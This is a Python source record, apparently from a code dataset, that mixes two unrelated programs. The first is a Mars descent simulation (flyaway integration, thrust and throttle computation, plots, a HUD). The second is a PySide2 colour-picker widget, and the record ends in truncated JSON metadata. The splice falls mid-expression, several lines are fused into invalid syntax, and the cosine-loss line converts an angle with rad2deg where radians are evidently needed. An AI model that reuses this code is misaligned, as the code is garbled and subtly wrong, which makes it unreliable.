bridle cut\n #Fly the descent stage off to its final resting place (rest in pieces)\n r0v=self.svf[:3,None,-1]\n v0v=self.svf[3:,None,-1]\n r0=vlength(r0v)\n dsrvfs=[r0v]\n dsvvfs=[v0v]\n ets=[et0]\n m=self.mass[\"DescentStage\"][\"Dry\"]+self.mass[\"DescentStage\"][\"PostLandProp\"]\n i=1\n done=False\n while not done:\n et=et0+i/sps\n #Pitch down from vertical\n pitchdown=np.deg2rad(linterp(0.7,0,1.7,45,et-self.events[\"bridle\"],bound=True))\n if et-self.events[\"bridle\"]<0.7:\n #hover\n F=4*2000\n elif et-self.events[\"bridle\"]<6.7:\n F=4*3000\n else:\n F=0\n #Force direction at current time, in body frame at bridle cut time\n fhatb1=np.array([[0],[-np.sin(pitchdown)],[-np.cos(pitchdown)]])\n #Cosine loss -- we are flying on the canted engines\n fhatb1*=np.cos(np.rad2deg(25))\n #Transform to frozen frame\n fhatf=Mr(Mds1sfb) @ fhatb1\n dsrvf=dsrvfs[i-1]\n dsvvf=dsvvfs[i-1]\n windf=vcross(np.array([[0], [0], [self.mars_omega]]), dsrvf)\n dsuvf=dsvvf-windf #air-relative motion in frozen frame. Drag vector is antiparallel to this vector\n q=self.rho0*vlength(dsuvf)**2/2\n Dv=-vnormalize(dsuvf)*q*self.CdA\n Fv=F*fhatf\n mdot=-F/self.mle_ve\n agvf= aTwoBody(dsrvf, gm=self.mars_gm) + aJ2(dsrvf, j2=self.mars_j2, gm=self.mars_gm, re=self.mars_re)\n dsavf=(Fv+Dv)/m+agvf\n dsrvfs.append(dsrvf+dsvvf*dt)\n dsvvfs.append(dsvvf+dsavf*dt)\n ets.append(et)\n m=m+mdot*dt\n i+=1\n done=vlength(dsrvf)<(r0-7)\n self.events[\"flyaway1\"] = et # Landing phase is over when kinetic energy of all hardware relative to surface is zero\n self.i_step[\"flyaway1\"]=i-1+self.ets.size\n #sort the event list\n self.events=dict(sorted(self.events.items(),key=lambda x:x[1]))\n self.write_events()\n k=\"flyaway1\"\n v=self.events[k]\n print(f\"Event {k:15}: E{self.format_time(v, self.events['ei'])} L{self.format_time(v, self.events['land'])} ET{v:.3f} ({spiceypy.etcal(v)}) i_step {self.i_step[k]:6d}\")\n print(f\"Done integrating flyaway. Steps: {i}\")\n self._extend(dsrvfs,dsvvfs,ets)\n def _extend(self,dsrvfs,dsvvfs,ets):\n dsrvfs=np.array(dsrvfs)[:,:,0].T\n dsvvfs=np.array(dsvvfs)[:,:,0].T\n self.svf=np.hstack((self.svf,np.vstack((dsrvfs,dsvvfs))))\n n_ets_old = self.ets.size\n self.ets=np.hstack((self.ets,np.array(ets)))\n print(\"Extend the et list to anim_et1...\")\n n_ets_new = len(ets)\n self.dts=self.ets*0\n self.dts[1:]=self.ets[1:]-self.ets[:-1]\n self.dts[0]=self.dts[1]\n self.pdts=self.pdts+[et2pdt(et) for et in ets]\n self.i_steps=np.arange(len(self.ets))\n print(\"Extend the vector stacks to cover the new et range...\")\n self.Msrf = np.concatenate((self.Msrf, np.zeros((n_ets_new, 6, 6))), axis=0)\n self.sunr = np.concatenate((self.sunr, np.zeros((3, n_ets_new))), axis=1)\n self.earthr = np.concatenate((self.earthr, np.zeros((3, n_ets_new))), axis=1)\n self.earthlt = np.hstack((self.earthlt, np.zeros(n_ets_new)))\n self.rovsvr = np.concatenate((self.rovsvr, np.zeros((6, n_ets_new))), axis=1)\n for i_new, et in enumerate(ets):\n i = n_ets_old + i_new\n Msri = spiceypy.sxform(\"J2000\", \"IAU_MARS\", et) # Stack of matrices converting to rotating from inertial\n self.Msrf[i, :, :] = Msri @ self.Msfi.transpose()\n state, _ = spiceypy.spkezr(\"SUN\", et, \"IAU_MARS\", \"LT+S\", \"499\")\n self.sunr[:, i] = state[:3] * self.km\n state, lt = spiceypy.spkezr(\"399\", et, \"IAU_MARS\", \"XCN+S\", \"499\")\n self.earthr[:, i] = state[:3] * self.km\n self.earthlt[i] = lt\n self.rovsvr[:,n_ets_old:]=self.rovsvr[:,None,n_ets_old-1]\n\n def _acc(self):\n super()._acc()\n self._thrust()\n def _thrust(self):\n \"\"\"\n Calculate thrust needed to perform powered descent,\n :sets pdv_mass: PDV mass, only valid after backshell separation\n :sets delta_v: accumulated delta-v\n :sets throttle_straight: throttle level for straight engines\n :sets throttle_cant: throttle level for canted engines\n \"\"\"\n print(\"Calculating thrust and throttle...\")\n self.pdv_mass=np.zeros(self.ets.size)\n self.delta_v=np.zeros(self.ets.size)\n self.throttle_straight=np.zeros(self.ets.size)\n self.throttle_cant=np.zeros(self.ets.size)\n et_pdi=self.events[\"pdi\"]\n et_skycrane0=self.events[\"skycrane\"]\n w=np.where(self.etsdrag else 0 #effective vertical thrust\n n_mle=8 if et10000:\n print(\"Hey!\")#kg/s fuel flow from all active engines\n dt=et-self.ets[i-1]\n dv=(Fvert/m)*dt #Only include effect of vertical thrust, not drag\n self.pdv_mass[i]=m-dt*mdot\n self.prop_used[i]=self.prop_used[i-1]+dt*mdot\n self.delta_v[i]=self.delta_v[i-1]+dv\n self.Ftot=smooth(self.Ftot,-50,50)\n self.Fvert=smooth(self.Fvert,-50,50)\n self.throttle_straight=smooth(self.throttle_straight,-50,50)\n self.throttle_cant=smooth(self.throttle_cant,-50,50)\n self.plot_throttle()\n return None\n def tabulate(self):\n super().tabulate()\n self.t_rovsvr=tableterp(self.ets,self.rovsvr)\n self.t_Ftot=tableterp(self.ets,self.Ftot)\n self.t_Fvert=tableterp(self.ets,self.Fvert)\n self.t_throttle_straight=tableterp(self.ets,self.throttle_straight)\n self.t_throttle_cant=tableterp(self.ets,self.throttle_cant)\n self.t_pdv_mass=tableterp(self.ets,self.pdv_mass)\n self.t_delta_v=tableterp(self.ets,self.delta_v)\n self.t_prop_used = tableterp(self.ets, self.prop_used)\n\n def _print_pov(self, et_step, i_step, tiles=None, file=None):\n super()._print_pov(et_step, i_step, tiles=tiles, file=file)\n self.print_vector(\"Rrover\",v=self.t_rovsvr(et_step)[:3],comment=\"Rover position vector\",file=file)\n self.print_vector(\"Vrover\",v=self.t_rovsvr(et_step)[3:],comment=\"Rover velocity vector\",file=file)\n self.print_scalar(\"Fvert\",v=self.t_Fvert(et_step),comment=\"Vertical thrust\",file=file)\n self.print_scalar(\"Ftot\",v=self.t_Ftot(et_step),comment=\"Total thrust\",file=file)\n self.print_scalar(\"Fstraight\",v=self.t_throttle_straight(et_step),comment=\"Thrust on each straight engine\",file=file)\n self.print_scalar(\"Fcant\",v=self.t_throttle_cant(et_step),comment=\"Thrust on each canted engine\",file=file)\n self.print_scalar(\"Prop_used\",v=self.t_prop_used(et_step),comment=\"Propellant used\",file=file)\n self.print_scalar(\"PDV_mass\",v=self.t_pdv_mass(et_step),comment=\"Powered Descent Vehicle wet mass\",file=file)\n self.print_scalar(\"DeltaV\", v=self.t_delta_v(et_step), comment=\"Effective Delta-V\", file=file)\n\n def plot_throttle(self):\n plt.figure('mass')\n max=np.max(self.pdv_mass)\n plt.plot(self.ets,self.pdv_mass,'-',label=\"PDV wet mass\")\n plt.plot(self.ets,self.prop_used,'-',label=\"PDV prop used\")\n plt.legend()\n plt.ylabel('mass/kg')\n self.plot_events(0,max)\n plt.legend()\n\n plt.figure('thrust')\n F=self.throttle_cant*4+self.throttle_straight*4\n max=np.max(F)\n plt.plot(self.ets,F,'-',label=\"Total thrust\")\n plt.plot(self.ets,self.throttle_cant,'-',label=\"Canted engine thrust/each\")\n plt.plot(self.ets,self.throttle_straight,'-',label=\"Straight engine thrust/each\")\n plt.legend()\n plt.ylabel('thrust/N')\n self.plot_events(0,max)\n plt.legend()\n\n plt.figure('DeltaV')\n max=np.max(self.delta_v)\n plt.plot(self.ets,self.delta_v,'-',label=\"Accumulated Delta-V\")\n plt.legend()\n plt.ylabel('DeltaV/(m/s)')\n self.plot_events(0,max)\n plt.legend()\n plt.pause(0.001)\n\nclass JPLHUD(HUD):\n def draw_meter(self,pb:PictureBox,*,xc:float,v0:float,v1:float,v:float,name:str,units:str):\n scl=1\n r=70*scl\n xc=xc*scl\n yc=960*scl\n lw=8*scl\n pb.arc(xc,yc,r,90,315,color='w',linewidth=lw,fill=False,alpha=0.5)\n pb.arc(xc,yc,r,90,linterp(v0,90,v1,315,v1 if v>v1 else v0 if v= -1:\n event.acceptProposedAction()\n return\n event.ignore()\n\n def dragMoveEvent(self, event):\n pos = event.pos()\n self._index = self.index_from_event_pos(event.pos())\n self.update()\n event.acceptProposedAction()\n\n def dropEvent(self, event):\n if event.mimeData().hasText():\n index = decode_index(event.mimeData().text())\n if index >= -1:\n self._index = self.index_from_event_pos(event.pos())\n color = qcolor_linear_to_srgb(color_from_index(index))\n self._colors[self._index] = (index, color)\n event.acceptProposedAction()\n self.update()\n return\n event.ignore()\n\n def mouseDoubleClickEvent(self, event):\n # TODO: emit signal\n self._index = self.index_from_event_pos(event.pos())\n print(self._index)\n event.accept()\n\n def update_index(self, index):\n swatch = self._colors[index]\n color = swatch[1]\n rgb = color.rgb() & 0xFFFFFF\n (r, g, b, _) = color.getRgb()\n tip = \"HEX: #{:06X} RGB: ({:03d} {:03d} {:03d})\".format(rgb, r, g, b)\n self.setToolTip(tip)\n self.update()\n\n\nclass TColorPreview(QWidget):\n doubleClicked = Signal()\n\n def __init__(self, parent):\n super(TColorPreview, self).__init__(parent)\n self._color = QColor(Qt.white)\n self._color_srgb = QColor(Qt.white)\n self._dragStartPosition = QPoint()\n\n menu = QMenu(self)\n menu.addAction(\"Copy by index\", lambda: self.clipboard_color(\"index\"))\n menu.addAction(\"Copy as Linear\", lambda: self.clipboard_color(\"linear\"))\n menu.addAction(\"Copy as sRGB\", lambda: self.clipboard_color(\"srgb\"))\n self.menu = menu\n\n def paintEvent(self, event):\n painter = QPainter(self)\n painter.fillRect(self.rect(), QBrush(self._color_srgb))\n painter.setCompositionMode(QPainter.RasterOp_SourceXorDestination)\n pen = QPen(QBrush(Qt.white), 2., Qt.SolidLine, Qt.SquareCap, Qt.MiterJoin)\n painter.setPen(pen)\n painter.drawRect(self.rect().adjusted(1, 1, -1, -1))\n\n def mouseDoubleClickEvent(self, event):\n self.doubleClicked.emit()\n event.accept()\n\n def contextMenuEvent(self, event):\n self.menu.popup(event.globalPos())\n\n @property\n def color(self):\n return self._color\n\n @color.setter\n def color(self, value):\n self._color = value\n self._color_srgb = qcolor_linear_to_srgb(value)\n\n rgb = value.rgb() & 0xFFFFFF\n self.setToolTip(\"#{:06X}\".format(rgb))\n r, g, b, _ = value.getRgb()\n h, s, v, _ = value.getHsv()\n # Qt returns a hue value of -1 for achromatic colors\n h = max(0, h)\n tip = \"HEX: #{:06X} RGB: ({:03d} {:03d} {:03d}) HSV: ({:03d} {:03d} {:03d})\".format(rgb, r, g, b, h, s, v)\n self.setStatusTip(tip)\n self.update()\n\n def clipboard_color(self, mode):\n if mode == \"hex\":\n rgb = self._color.rgb() & 0xFFFFFF\n text = \"{:06X}\".format(rgb)\n elif mode == \"index\":\n text = encode_index(self.parentWidget().index)\n else:\n (r, g, b, _) = self._color_srgb.getRgb() if mode == \"srgb\" else self._color.getRgb()\n text = \"{:1f} {:1f} {:1f} 1.0\".format(r / 255., g / 255., b / 255.)\n\n clipboard = QApplication.clipboard()\n clipboard.setText(text)\n\n def mousePressEvent(self, event):\n if event.button() == Qt.LeftButton:\n self._dragStartPosition = event.pos()\n\n def mouseMoveEvent(self, event):\n if event.buttons() != Qt.LeftButton:\n return\n if (event.pos() - self._dragStartPosition).manhattanLength() < QApplication.startDragDistance():\n return\n\n pixmap = QPixmap(23, 23)\n pixmap.fill(self._color_srgb)\n\n drag = QDrag(self)\n mime_data = QMimeData()\n text = encode_index(self.parentWidget().index)\n mime_data.setText(text)\n drag.setMimeData(mime_data)\n drag.setPixmap(pixmap)\n\n drop_action = drag.start(Qt.CopyAction) # | Qt.MoveAction)\n\n\nclass TColorPicker(QWidget):\n doubleClicked = Signal()\n\n def __init__(self, parent=None):\n super(TColorPicker, self).__init__(parent)\n self.setFocusPolicy(Qt.ClickFocus)\n self.setWindowTitle(\"Color Picker\")\n self._index_offset = 256\n\n self._swatch = TSwatch(self)\n self._swatch.move(8, 8)\n geom = self._swatch.geometry()\n\n self._prewiew = TColorPreview(self)\n self._prewiew.setGeometry(8, geom.bottom() + 8, 137, 48)\n self._prewiew.doubleClicked.connect(lambda: self.doubleClicked.emit())\n geom = self._prewiew.geometry()\n\n self._label = QLabel(self)\n self._label.setGeometry(geom.right() + 8, geom.top(), 168, geom.height())\n self._label.setFont(QFont(\"Courier New\"))\n self._label.setText(\"line 1\\nline 2\")\n\n self._box_sv = TColorPickerSV(self)\n self._box_sv.setGeometry(self._box_sv.rect().translated(8, geom.bottom() + 8))\n self._box_sv.changed.connect(self.color_changed)\n self._box_sv.doubleClicked.connect(lambda: self.doubleClicked.emit())\n geom = self._box_sv.geometry()\n\n self._bar_hue = TColorPickerHue(self)\n self._bar_hue.setGeometry(self._bar_hue.rect().translated(geom.right() + 8, geom.top() - 1))\n self._bar_hue.changed.connect(self._box_sv.set_hue)\n\n br = self._bar_hue.geometry().bottomRight()\n self.setFixedSize(br.x() + 8, br.y() + 8)\n\t\t\n self._box_sv.set_hue(0)\n\n def keyPressEvent(self, event):\n if event.modifiers() == Qt.ShiftModifier:\n self._bar_hue.keyPressEvent(event)\n else:\n self._box_sv.keyPressEvent(event)\n\n def wheelEvent(self, event):\n e = QKeyEvent(QEvent.None_, Qt.Key_Down if event.delta() < 0 else Qt.Key_Up, Qt.NoModifier)\n self._bar_hue.keyPressEvent(e)\n event.accept()\n\n def color_changed(self, value):\n self._prewiew.color = value\n # update color info\n rgb = value.rgb() & 0xFFFFFF # remove alpha\n (r, g, b, _) = value.getRgb()\n (h, s, v, _) = value.getHsv()\n # Qt returns a hue value of -1 for achromatic colors\n if h == -1: h = 0\n self._label.setText(\"HEX: #{:>06X}\\nRGB: ({:03d} {:03d} {:03d})\\nHSV: ({:03d} {:03d} {:03d})\".format(rgb, r, g, b, h, s, v))\n self.doubleClicked.emit()\n\n @property\n def index(self):\n eh = self._bar_hue._pos\n eh = eh if eh < 90 else 0\n es = self._box_sv._pos.x()\n ev = self._box_sv._pos.y()\n if ev == 0 or es == 0:\n es = eh = 0\n index = self._index_offset + eh * 25 * 25 + ev * 25 + es\n return index\n\n @index.setter\n def index(self, value):\n eh, es, ev = get_hsv_indexes(value)\n self._bar_hue.set_pos(eh)\n self._box_sv.set_pos(QPoint(es, ev))\n\n @property\n def color(self):\n return self._prewiew.color\n\n @color.setter\n def color(self, value):\n h, s, v, _ = value.getHsv()\n # Qt returns a hue value of -1 for achromatic colors\n h = max(0, h)\n eh = int(h / 4.)\n es = int(s / 10.2)\n ev = int(v / 10.2)\n if ev == 0:\n eh = es = 0\n if ev == 255 and es == 0:\n eh = 0\n self._bar_hue.set_pos(eh)\n self._box_sv.set_pos(QPoint(es, ev))\n\n\nclass TMainWindow(QMainWindow):\n def __init__(self, parent=None):\n super(TMainWindow, self).__init__(parent)\n self.setWindowFlags(self.windowFlags() | Qt.MSWindowsFixedSizeDialogHint & ~Qt.WindowMaximizeButtonHint)\n self.setWindowTitle(\"Color Picker\")\n\n self.setStatusBar(QStatusBar(self))\n\n picker = TColorPicker(self)\n self.setCentralWidget(picker)\n\n\ndef main():\n app = QApplication(sys.argv)\n window = TMainWindow()\n # pal = QPalette()\n # pal.setColor(QPalette.Background, QColor(100, 100, 100))\n # window.setAutoFillBackground(True)\n # window.setPalette(pal)\n window.show()\n app.exec_()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "ATGH15102AFMLD/techart-staff", "sub_path": "python/color_picker/color_picker.py", "file_name": "color_picker.py", "file_ext": "py", "file_size_in_byte": 19820, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PySide2.QtGui.QColor.fromRgbF", "line_number": 79, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 79, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QColor.fromRgbF", "line_number": 94, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 94, "usage_type": "name"}, {"api_name": "re.search", "line_number": 106, "usage_type": "call"}, {"api_name": "math.fmod", "line_number": 116, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor.fromHsv", "line_number": 127, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 127, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 130, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 131, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 131, "usage_type": "argument"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 132, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 137, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 140, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.white", "line_number": 140, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 140, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 141, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QPoint", "line_number": 142, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 154, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QImage", "line_number": 166, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QImage.Format_RGB32", "line_number": 166, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui.QPixmap.fromImage", "line_number": 167, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 167, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.KeepAspectRatio", "line_number": 167, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 167, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.FastTransformation", "line_number": 167, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui.QColor.fromHsv", "line_number": 177, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 177, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QPoint", "line_number": 184, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 188, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPainter.RasterOp_SourceXorDestination", "line_number": 191, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 191, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPen", "line_number": 192, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QBrush", "line_number": 192, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.white", "line_number": 192, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 192, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.SolidLine", "line_number": 192, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.SquareCap", "line_number": 192, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.MiterJoin", "line_number": 192, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.QRect", "line_number": 195, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.Key_Left", "line_number": 212, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 212, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Right", "line_number": 212, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.Key_Up", "line_number": 212, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.Key_Down", "line_number": 212, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.Key_Left", "line_number": 214, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 214, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Right", "line_number": 215, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 215, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Up", "line_number": 216, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 216, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Down", "line_number": 217, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 217, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QPoint", "line_number": 218, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 222, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 223, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 228, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 230, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 231, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 238, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QImage", "line_number": 249, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QImage.Format_RGB32", "line_number": 249, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui.QPixmap.fromImage", "line_number": 250, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 250, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 250, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.IgnoreAspectRatio", "line_number": 250, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 250, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.FastTransformation", "line_number": 250, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 254, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPen", "line_number": 259, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QBrush", "line_number": 259, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.black", "line_number": 259, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 259, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.SolidLine", "line_number": 259, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.SquareCap", "line_number": 259, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.MiterJoin", "line_number": 259, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.QRect", "line_number": 261, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.Key_Left", "line_number": 286, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 286, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Right", "line_number": 286, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.Key_Up", "line_number": 286, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.Key_Down", "line_number": 286, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.Key_Up", "line_number": 288, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 288, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Down", "line_number": 289, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 289, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 296, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 297, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 302, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 303, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 313, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.white", "line_number": 313, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 313, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.ClickFocus", "line_number": 316, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 316, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 333, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QRect", "line_number": 342, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QBrush", "line_number": 343, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPainter.RasterOp_SourceXorDestination", "line_number": 346, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 346, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPen", "line_number": 347, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QBrush", "line_number": 347, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.white", "line_number": 347, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 347, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.SolidLine", "line_number": 347, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.SquareCap", "line_number": 347, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.MiterJoin", "line_number": 347, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.QRect", "line_number": 351, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.NoButton", "line_number": 355, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 355, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.LeftButton", "line_number": 355, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.LeftButton", "line_number": 363, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 363, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 410, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 411, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 415, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.white", "line_number": 415, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 415, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 416, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.white", "line_number": 416, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 416, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QPoint", "line_number": 417, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QMenu", "line_number": 419, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 426, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QBrush", "line_number": 427, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPainter.RasterOp_SourceXorDestination", "line_number": 428, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 428, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPen", "line_number": 429, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QBrush", "line_number": 429, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.white", "line_number": 429, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 429, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.SolidLine", "line_number": 429, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.SquareCap", "line_number": 429, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.MiterJoin", "line_number": 429, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QApplication.clipboard", "line_number": 469, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 469, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.LeftButton", "line_number": 473, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 473, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.LeftButton", "line_number": 477, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 477, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QApplication.startDragDistance", "line_number": 479, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 479, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 482, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QDrag", "line_number": 485, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QMimeData", "line_number": 486, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.CopyAction", "line_number": 492, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 492, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 495, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 496, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.ClickFocus", "line_number": 500, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 500, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QLabel", "line_number": 513, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QFont", "line_number": 515, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.ShiftModifier", "line_number": 534, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 534, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QKeyEvent", "line_number": 540, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QEvent.None_", "line_number": 540, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.QEvent", "line_number": 540, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Down", "line_number": 540, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 540, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Up", "line_number": 540, "usage_type": "attribute"}, {"api_name": 